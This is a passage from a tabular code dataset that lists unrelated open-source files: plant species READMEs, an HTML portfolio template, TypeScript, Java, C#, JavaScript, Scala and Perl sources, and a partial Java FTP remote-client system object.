code
stringlengths 3
1.05M
| repo_name
stringlengths 4
116
| path
stringlengths 3
942
| language
stringclasses 30
values | license
stringclasses 15
values | size
int32 3
1.05M
|
---|---|---|---|---|---|
# Cercanthemum squamiferum Tiegh. SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Malpighiales/Ochnaceae/Cercanthemum/Cercanthemum squamiferum/README.md | Markdown | apache-2.0 | 181 |
# Strobilanthes hirsuta Decne. SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Lamiales/Acanthaceae/Strobilanthes/Strobilanthes hirsuta/README.md | Markdown | apache-2.0 | 178 |
# Matayba atropurpurea Radlk. SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Sapindales/Sapindaceae/Matayba/Matayba atropurpurea/README.md | Markdown | apache-2.0 | 177 |
# Nephelea arborea (L.) Sehnem SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Pteridophyta/Polypodiopsida/Cyatheales/Cyatheaceae/Nephelea/Nephelea arborea/README.md | Markdown | apache-2.0 | 178 |
<!-- Portfolio Grid Section -->
<section id="portfolio" class="bg-light-gray">
<div class="container">
<div class="row">
<div class="col-lg-12 text-center">
<h2 class="section-heading">Portfolio</h2>
<h3 class="section-subheading text-muted"></h3>
</div>
</div>
<div class="row">
{% for post in site.posts %}
<div class="col-md-4 col-sm-6 portfolio-item">
<a href="#portfolioModal{{ post.modal-id }}" class="portfolio-link" data-toggle="modal">
<div class="portfolio-hover">
<div class="portfolio-hover-content">
<i class="fa fa-plus fa-3x"></i>
</div>
</div>
<img src="img/portfolio/{{ post.thumbnail }}" class="img-responsive img-centered" alt="post.alt">
</a>
<div class="portfolio-caption">
<h4>{{ post.title }}</h4>
<p class="text-muted">{{ post.subtitle }}</p>
</div>
</div>
{% endfor %}
</div>
</div>
</section>
| nicoletufts/nicoletufts.github.io | _includes/portfolio_grid.html | HTML | apache-2.0 | 1,307 |
/*
* Copyright 2019 ThoughtWorks, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import {ApiRequestBuilder, ApiVersion} from "helpers/api_request_builder";
import SparkRoutes from "helpers/spark_routes";
export interface BulkUpdateSystemAdminJSON {
operations: {
users: {
add?: string[],
remove?: string[]
}
};
}
export class AdminsCRUD {
static API_VERSION_HEADER = ApiVersion.v2;
static all() {
return ApiRequestBuilder.GET(SparkRoutes.apisystemAdminsPath(), this.API_VERSION_HEADER);
}
static bulkUpdate(bulkUpdateSystemAdminJson: BulkUpdateSystemAdminJSON) {
return ApiRequestBuilder.PATCH(SparkRoutes.apisystemAdminsPath(), this.API_VERSION_HEADER, {payload: bulkUpdateSystemAdminJson});
}
}
| jyotisingh/gocd | server/webapp/WEB-INF/rails/webpack/models/admins/admin_crud.ts | TypeScript | apache-2.0 | 1,266 |
/*
* Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.iotevents.model;
import java.io.Serializable;
import javax.annotation.Generated;
/**
*
* @see <a href="http://docs.aws.amazon.com/goto/WebAPI/iotevents-2018-07-27/UntagResource" target="_top">AWS API
* Documentation</a>
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class UntagResourceResult extends com.amazonaws.AmazonWebServiceResult<com.amazonaws.ResponseMetadata> implements Serializable, Cloneable {
/**
* Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be
* redacted from this string using a placeholder value.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof UntagResourceResult == false)
return false;
UntagResourceResult other = (UntagResourceResult) obj;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
return hashCode;
}
@Override
public UntagResourceResult clone() {
try {
return (UntagResourceResult) super.clone();
} catch (CloneNotSupportedException e) {
throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e);
}
}
}
| jentfoo/aws-sdk-java | aws-java-sdk-iotevents/src/main/java/com/amazonaws/services/iotevents/model/UntagResourceResult.java | Java | apache-2.0 | 2,326 |
// Copyright (c) kuicker.org. All rights reserved.
// Modified By YYYY-MM-DD
// kevinjong 2016-02-11 - Creation
using System.IO;
using System.Linq;
using Xunit;
namespace IsTo.Tests
{
public class TestHelper
{
internal static void StreamComparison(
Stream stream1,
Stream stream2)
{
var bufferSize = 2048;
var buffer1 = new byte[bufferSize];
var buffer2 = new byte[bufferSize];
while(true) {
var count1 = stream1.Read(buffer1, 0, bufferSize);
var count2 = stream2.Read(buffer2, 0, bufferSize);
Assert.True(count1 == count2);
if(count1 == 0) { return; }
Assert.True(
buffer1
.Take(count1)
.SequenceEqual(buffer2.Take(count2))
);
}
}
}
}
| Kuick/IsTo | IsTo.Tests/Misc/TestHelper.cs | C# | apache-2.0 | 765 |
/*
* Copyright 2020 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// Generated by the protocol buffer compiler. DO NOT EDIT!
// source: google/cloud/aiplatform/v1/model_service.proto
package com.google.cloud.aiplatform.v1;
/**
*
*
* <pre>
* Response message of [ModelService.ExportModel][google.cloud.aiplatform.v1.ModelService.ExportModel] operation.
* </pre>
*
* Protobuf type {@code google.cloud.aiplatform.v1.ExportModelResponse}
*/
public final class ExportModelResponse extends com.google.protobuf.GeneratedMessageV3
implements
// @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1.ExportModelResponse)
ExportModelResponseOrBuilder {
private static final long serialVersionUID = 0L;
// Use ExportModelResponse.newBuilder() to construct.
private ExportModelResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private ExportModelResponse() {}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(UnusedPrivateParameter unused) {
return new ExportModelResponse();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet getUnknownFields() {
return this.unknownFields;
}
private ExportModelResponse(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
default:
{
if (!parseUnknownField(input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_fieldAccessorTable
.ensureFieldAccessorsInitialized(
com.google.cloud.aiplatform.v1.ExportModelResponse.class,
com.google.cloud.aiplatform.v1.ExportModelResponse.Builder.class);
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException {
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof com.google.cloud.aiplatform.v1.ExportModelResponse)) {
return super.equals(obj);
}
com.google.cloud.aiplatform.v1.ExportModelResponse other =
(com.google.cloud.aiplatform.v1.ExportModelResponse) obj;
if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
java.io.InputStream input) throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseWithIOException(
PARSER, input, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseDelimitedFrom(
java.io.InputStream input) throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseDelimitedFrom(
java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(
PARSER, input, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
com.google.protobuf.CodedInputStream input) throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseWithIOException(
PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() {
return newBuilder();
}
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(com.google.cloud.aiplatform.v1.ExportModelResponse prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
*
*
* <pre>
* Response message of [ModelService.ExportModel][google.cloud.aiplatform.v1.ModelService.ExportModel] operation.
* </pre>
*
* Protobuf type {@code google.cloud.aiplatform.v1.ExportModelResponse}
*/
public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder>
implements
// @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1.ExportModelResponse)
com.google.cloud.aiplatform.v1.ExportModelResponseOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_fieldAccessorTable
.ensureFieldAccessorsInitialized(
com.google.cloud.aiplatform.v1.ExportModelResponse.class,
com.google.cloud.aiplatform.v1.ExportModelResponse.Builder.class);
}
// Construct using com.google.cloud.aiplatform.v1.ExportModelResponse.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {}
}
@java.lang.Override
public Builder clear() {
super.clear();
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor;
}
@java.lang.Override
public com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstanceForType() {
return com.google.cloud.aiplatform.v1.ExportModelResponse.getDefaultInstance();
}
@java.lang.Override
public com.google.cloud.aiplatform.v1.ExportModelResponse build() {
com.google.cloud.aiplatform.v1.ExportModelResponse result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
@java.lang.Override
public com.google.cloud.aiplatform.v1.ExportModelResponse buildPartial() {
com.google.cloud.aiplatform.v1.ExportModelResponse result =
new com.google.cloud.aiplatform.v1.ExportModelResponse(this);
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof com.google.cloud.aiplatform.v1.ExportModelResponse) {
return mergeFrom((com.google.cloud.aiplatform.v1.ExportModelResponse) other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(com.google.cloud.aiplatform.v1.ExportModelResponse other) {
if (other == com.google.cloud.aiplatform.v1.ExportModelResponse.getDefaultInstance())
return this;
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
com.google.cloud.aiplatform.v1.ExportModelResponse parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage =
(com.google.cloud.aiplatform.v1.ExportModelResponse) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
@java.lang.Override
public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1.ExportModelResponse)
}
// @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1.ExportModelResponse)
private static final com.google.cloud.aiplatform.v1.ExportModelResponse DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1.ExportModelResponse();
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstance() {
return DEFAULT_INSTANCE;
}
private static final com.google.protobuf.Parser<ExportModelResponse> PARSER =
new com.google.protobuf.AbstractParser<ExportModelResponse>() {
@java.lang.Override
public ExportModelResponse parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new ExportModelResponse(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<ExportModelResponse> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<ExportModelResponse> getParserForType() {
return PARSER;
}
@java.lang.Override
public com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
| googleapis/java-aiplatform | proto-google-cloud-aiplatform-v1/src/main/java/com/google/cloud/aiplatform/v1/ExportModelResponse.java | Java | apache-2.0 | 16,200 |
/*!
* Module requirements
*/
var NeopreneError = require('../error')
/**
* Document Validation Error
*
* @api private
* @param {Document} instance
* @inherits NeopreneError
*/
function ValidationError (instance) {
NeopreneError.call(this, "Validation failed");
Error.captureStackTrace(this, arguments.callee);
this.name = 'ValidationError';
this.errors = instance.errors = {};
};
/**
* Console.log helper
* @api private
*/
ValidationError.prototype.toString = function () {
return this.name + ': ' + Object.keys(this.errors).map(function (key) {
return String(this.errors[key]);
}, this).join(', ');
};
/*!
* Inherits from NeopreneError.
*/
ValidationError.prototype.__proto__ = NeopreneError.prototype;
/*!
* Module exports
*/
module.exports = exports = ValidationError;
| rorymadden/neoprene | lib/errors/validation.js | JavaScript | apache-2.0 | 813 |
package com.twitter.tiny
import com.google.inject.Stage
import com.twitter.finatra.http.test.EmbeddedHttpServer
import com.twitter.inject.server.FeatureTest
class TinyUrlServerStartupTest extends FeatureTest {
override val server = new EmbeddedHttpServer(
stage = Stage.PRODUCTION,
twitterServer = new TinyUrlServer)
"Server" should {
"startup" in {
server.assertAppStarted()
}
}
}
| joecwu/finatra | examples/tiny-url/src/test/scala/com/twitter/tiny/TinyUrlServerStartupTest.scala | Scala | apache-2.0 | 414 |
#
# Copyright 2019 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package hardware::server::hp::proliant::snmp::mode::components::daldrive;
use strict;
use warnings;
my %map_daldrive_condition = (
1 => 'other',
2 => 'ok',
3 => 'degraded',
4 => 'failed',
);
my %map_ldrive_status = (
1 => 'other',
2 => 'ok',
3 => 'failed',
4 => 'unconfigured',
5 => 'recovering',
6 => 'readyForRebuild',
7 => 'rebuilding',
8 => 'wrongDrive',
9 => 'badConnect',
10 => 'overheating',
11 => 'shutdown',
12 => 'expanding',
13 => 'notAvailable',
14 => 'queuedForExpansion',
15 => 'multipathAccessDegraded',
16 => 'erasing',
);
my %map_faulttol = (
1 => 'other',
2 => 'none',
3 => 'mirroring',
4 => 'dataGuard',
5 => 'distribDataGuard',
7 => 'advancedDataGuard',
8 => 'raid50',
9 => 'raid60',
);
# In 'CPQIDA-MIB.mib'
my $mapping = {
cpqDaLogDrvFaultTol => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.3', map => \%map_faulttol },
cpqDaLogDrvStatus => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.4', map => \%map_ldrive_status },
};
my $mapping2 = {
cpqDaLogDrvCondition => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.11', map => \%map_daldrive_condition },
};
my $oid_cpqDaLogDrvEntry = '.1.3.6.1.4.1.232.3.2.3.1.1';
my $oid_cpqDaLogDrvCondition = '.1.3.6.1.4.1.232.3.2.3.1.1.11';
sub load {
my ($self) = @_;
push @{$self->{request}}, { oid => $oid_cpqDaLogDrvEntry, start => $mapping->{cpqDaLogDrvFaultTol}->{oid}, end => $mapping->{cpqDaLogDrvStatus}->{oid} },
{ oid => $oid_cpqDaLogDrvCondition };
}
sub check {
my ($self) = @_;
$self->{output}->output_add(long_msg => "Checking da logical drives");
$self->{components}->{daldrive} = {name => 'da logical drives', total => 0, skip => 0};
return if ($self->check_filter(section => 'daldrive'));
foreach my $oid ($self->{snmp}->oid_lex_sort(keys %{$self->{results}->{$oid_cpqDaLogDrvCondition}})) {
next if ($oid !~ /^$mapping2->{cpqDaLogDrvCondition}->{oid}\.(.*)$/);
my $instance = $1;
my $result = $self->{snmp}->map_instance(mapping => $mapping, results => $self->{results}->{$oid_cpqDaLogDrvEntry}, instance => $instance);
my $result2 = $self->{snmp}->map_instance(mapping => $mapping2, results => $self->{results}->{$oid_cpqDaLogDrvCondition}, instance => $instance);
next if ($self->check_filter(section => 'daldrive', instance => $instance));
$self->{components}->{daldrive}->{total}++;
$self->{output}->output_add(long_msg => sprintf("da logical drive '%s' [fault tolerance: %s, condition: %s] status is %s.",
$instance,
$result->{cpqDaLogDrvFaultTol},
$result2->{cpqDaLogDrvCondition},
$result->{cpqDaLogDrvStatus}));
my $exit = $self->get_severity(section => 'daldrive', value => $result->{cpqDaLogDrvStatus});
if (!$self->{output}->is_status(value => $exit, compare => 'ok', litteral => 1)) {
$self->{output}->output_add(severity => $exit,
short_msg => sprintf("da logical drive '%s' is %s",
$instance, $result->{cpqDaLogDrvStatus}));
}
}
}
1; | Sims24/centreon-plugins | hardware/server/hp/proliant/snmp/mode/components/daldrive.pm | Perl | apache-2.0 | 4,072 |
/*
* Copyright 2005-2010 Ignis Software Tools Ltd. All rights reserved.
*/
package com.aqua.filetransfer.ftp;
import java.io.File;
import java.io.FileInputStream;
import java.util.Properties;
import jsystem.framework.JSystemProperties;
import jsystem.framework.system.SystemObjectImpl;
import jsystem.utils.FileUtils;
import jsystem.utils.ReflectionUtils;
import jsystem.utils.StringUtils;
import systemobject.terminal.Cli;
import systemobject.terminal.Prompt;
import com.aqua.sysobj.conn.CliConnection;
import com.aqua.sysobj.conn.CliConnectionImpl;
import com.aqua.sysobj.conn.CliFactory;
/**
* <b>SystemObject for running FTP client on a remote machine.</b><br>
* The main purpose of this system object is to enable file transfer
* without assuming an FTP server is running on the remote machine.<br>
* In a typical usage of this SystemObject, an embedded FTP server
* will be activated on the local machine.
* A {@link Cli} session is opened with the remote client the session
* activates the FTP client on the remote machine. <br>
*
* <u>Using FTPRemoteClient</u><br>
* SystemObject can be instantiated from sut file or directly in the code.
* Once initiated copy operations can be used.
* The copy operations identifies whether a connection is already open if not
* a connection is opened.<br>
* In many cases the remote server (telnet/ssh) limits number of connections;
* use the {@link #closeFTPSession()} to close connection when needed.<br>
*
* Passivation: since TAS 4.9 the sys object support passivation. Please note that passivation
* is only supported when the remote client is a linux machine.
* In case the built-in prompts are not enough to open an FTP session
* with the FTP server you are using the system object also supports adding additional FTP prompts.
* To do that write a property file called {@link #FILE_TRANSFER_PROPERTIES_FILE_NAME}
* (in run directory) and add to it the following properties:
* {@link #FTP_LOGIN_PROMPTS} - comma seperated prompts which identifies that
* the FTP server waits for the user to enter the login user name
*
* {@link #FTP_PASSWORD_PROMPTS} - comma seperated prompts which identifies that
* the FTP server waits for the user to enter the password
*
* {@link #FTP_PROMPTS} - comma seperated prompts which identifies that
* the FTP server is waiting for an ftp command
*
* Since TAS 4.9 cli connectivity parameters to can be set using CliConnection.
* This can be done either by passing a CliConnection to the FtpRemoteClient constructor
* or setting the <code>cliConnection</code> member through the SUT file.
* When connectivity parameters are set using a CliConnection other connectivity
* parameters are ignored (host,operatingSystem,protocol,port,user,password).
*
* FTP Server address:
* -------------------
* FTP Server address is fetched as following:
* If the user gave value to the member {@link #ftpServerHostName} through the SUT file
* or by activating it's setter this will be the server to which the remote ftp client will
* try to connect.
* Next, when connecting, the system object will try to fetch the property {@value #LOCAL_HOST_ADDRESS_PROPERTY}
* from the jsystem.properties file, if the property was set it will use it as server address
* otherwise, the system object uses java API to get local machine host name and uses it as server address.
*/
public class FTPRemoteClient extends SystemObjectImpl {
public static final String FILE_TRANSFER_PROPERTIES_FILE_NAME = "filetransfer.properties";
public static final String FTP_PROMPTS = "ftp.prompts";
public static final String FTP_LOGIN_PROMPTS = "ftp.login.prompts";
public static final String FTP_PASSWORD_PROMPTS = "ftp.password.prompts";
public static final String LOCAL_HOST_ADDRESS_PROPERTY = "local.host.external.name";
public CliConnection cliConnection;
private Cli cli;
private String host;
private String operatingSystem = CliFactory.OPERATING_SYSTEM_WINDOWS;
private String protocol = "telnet";
private int port = 23;
private String user;
private String password;
private String ftpServerHostName;
private String ftpUserName="aqua";
private String ftpPassword="aqua";
private boolean ascii ;
private Prompt[] ftpGeneralPrompts;
private Prompt[] ftpLoginPrompts;
private Prompt[] ftpPasswordPrompts;
private java.net.InetAddress localMachine;
private boolean promptOn = true;
/**
*/
public FTPRemoteClient(CliConnection cliConn,String ftpServerHostName) throws Exception{
cliConnection = cliConn;
setFtpServerHostName(ftpServerHostName);
}
/**
* Constructs a FTPRemoteClient for working on local machine as the remote machine.<br>
* Used for testing purposes.
*/
public FTPRemoteClient() throws Exception{
localMachine = java.net.InetAddress.getLocalHost();
setHost(localMachine.getHostName());
}
/**
* Constructs a FTPRemoteClient were remote machine is this machine.
* The FTPRemoteClient assumes Aqua's embedded FTP server is running on
* this machine.
*/
public FTPRemoteClient(String user,String password) throws Exception {
this();
setUser(user);
setPassword(password);
}
/**
* Constructs a FTPRemoteClient were remote machine is <code>host</code>.
* The FTPRemoteClient assumes Aqua's embedded FTP server is running on
* this machine.
*/
public FTPRemoteClient(String host,String telnetUser,String telnetPassword,String ftpServerHostName) throws Exception{
this(telnetUser,telnetPassword);
setHost(host);
setFtpServerHostName(ftpServerHostName);
}
/**
* Initializes {@link FTPRemoteClient} members and verifies that
* a telnet connection can be opened to the remote client and
* that the remote client can open a FTP connection to the server.<br>
* All connections are closed when initialization is done.
* @see SystemObjectImpl#init()
*/
public void init() throws Exception {
super.init();
initPrompts();
}
/**
* Closes connection to remote machine.
*/
public void closeFTPSession(){
closeFtp();
closeCli();
}
/**
* Copies a file from FTP server machine(in most cases it will be the local machine)
* to the remote client.<br>
* Source file path should be relative to FTP user home directory and not absolute
* file path.
* Destination can be either absolute destination path or relative to client's
* user directory.<br>
*/
public void copyFileFromLocalMachineToRemoteClient(String source, String destination) throws Exception {
StringBuffer stringbuffer = new StringBuffer("get ");
destination = adjustPath(destination);
stringbuffer.append(source);
stringbuffer.append(" ");
stringbuffer.append(destination);
copyFileViaFTP(stringbuffer.toString());
}
/**
* Copies all files from FTP server machine(in most cases it will be the local machine)
* to the remote client.<br>
*
* @param filesPath - String Array (String...) of full file path.<br>
* @throws Exception
*/
public void copyAllFilesFromLocalMachineToLocalRemote(String... filesPath) throws Exception{
copyAllFilesViaFTP("mget ", filesPath);
}
/**
* Copies a file from the remote client to FTP server machine(in most cases it will be
* the local machine)
*
* Source file path can be either absolute destination path or relative to client's
* user directory.
* Destination should be relative to FTP user home directory and not absolute
* file path.
*/
public void copyFileFromRemoteClientToLocalMachine(String source, String destination) throws Exception {
source = adjustPath(source);
StringBuffer stringbuffer = new StringBuffer("put ");
stringbuffer.append(source);
stringbuffer.append(" ");
stringbuffer.append(destination);
copyFileViaFTP(stringbuffer.toString());
}
/**
* Copies all files from remote client to FTP server machine(in most cases it will be
